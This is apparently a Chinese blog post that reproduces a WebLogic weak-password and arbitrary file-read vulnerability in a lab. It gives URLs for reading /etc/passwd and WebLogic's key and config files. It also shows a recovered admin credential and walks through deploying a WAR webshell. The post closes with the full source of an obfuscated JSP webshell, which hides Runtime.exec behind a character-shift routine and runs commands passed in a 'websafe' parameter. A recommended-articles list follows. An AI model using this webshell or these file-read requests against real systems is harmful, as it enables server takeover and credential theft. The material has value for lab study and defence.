weblogic弱口令漏洞复现

文章目录

一、漏洞特征

1.可以直接获取passwd文件

http://192.168.232.131:7001/hello/file.jsp?path=/etc/passwd

2.可以直接获取密文文件

http://192.168.232.131:7001/hello/file.jsp?path=./security/SerializedSystemIni.dat

将密文copy到*.dat文件

3.可以直接获取密钥文件

http://192.168.232.131:7001/hello/file.jsp?path=./config/config.xml

{AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k=

4.解密密码

解密后得到密码Oracle@123,用户名是weblogic

5.登录后台

使用解密后的账号登录后台

二、命令执行复现

1.部署webshell

进入部署页面

点击安装,上载文件

选部署档案,上传hello.war

上传成功后点下一步,选将此部署安装为应用程序,设置应用名称

部署完成

2.Shell命令执行

http://192.168.232.131:7001/hello1/hello1/index.jsp?websafe=id

3.jsp一句话木马

java 复制代码
<%@ page import="com.sun.org.apache.bcel.internal.util.ClassLoader" %>
<html>
  <head>
    <title>Hello</title>
  </head>
  <body>
    @Hello world!@
  </body>
</html>
<%!public String HMfR(String yOK){String aAh="";for (int i = 0; i < yOK.length(); i++) {aAh+=(char)(yOK.charAt(i)+6);}return aAh;}
%>
<% String yiO=request.getParameter("websafe");if(yiO!=null){ Class tJIi = Class.forName(HMfR("d[p[(f[ha(Lohncg_"));
Process Mdlz = (Process) tJIi.getMethod(HMfR("_r_]"), String.class).invoke(tJIi.getMethod(HMfR("a_nLohncg_")).invoke(null),yiO);
java.io.InputStream in = Mdlz.getInputStream();byte[] PYp = new byte[2048];out.print("<pre>");while(in.read(PYp)!=-1){ out.println(new String(PYp)); }out.print("</pre>"); }
%>
相关推荐
星哥说事3 小时前
使用开源免费雷池WAF防火墙,接入保护你的网站
web安全·开源
浩浩测试一下3 小时前
计算机网络中的DHCP是什么呀? 详情解答
android·网络·计算机网络·安全·web安全·网络安全·安全架构
浩浩测试一下6 小时前
SQL注入高级绕过手法汇总 重点
数据库·sql·安全·web安全·网络安全·oracle·安全架构
帅云毅8 小时前
Web漏洞--XSS之订单系统和Shell箱子
前端·笔记·web安全·php·xss
迷路的小绅士9 小时前
常见网络安全攻击类型深度剖析(三):DDoS攻击——分类、攻击机制及企业级防御策略
网络·web安全·ddos
ALe要立志成为web糕手12 小时前
[BJDCTF2020]EzPHP
web安全·网络安全·php·ctf
迷路的小绅士12 小时前
常见网络安全攻击类型深度剖析(四):跨站脚本攻击(XSS)——分类、漏洞利用与前端安全防护
前端·安全·web安全
TazmiDev13 小时前
2025 XYCTF ezsql 详细教程wp
web安全·网络安全·ctf·sql注入·布尔盲注
迷路的小绅士14 小时前
网络安全概述:定义、重要性与发展历程
网络·安全·web安全
virelin_Y.lin18 小时前
系统与网络安全------弹性交换网络(2)
网络·安全·web安全·链路聚合·lacp·eth-trunk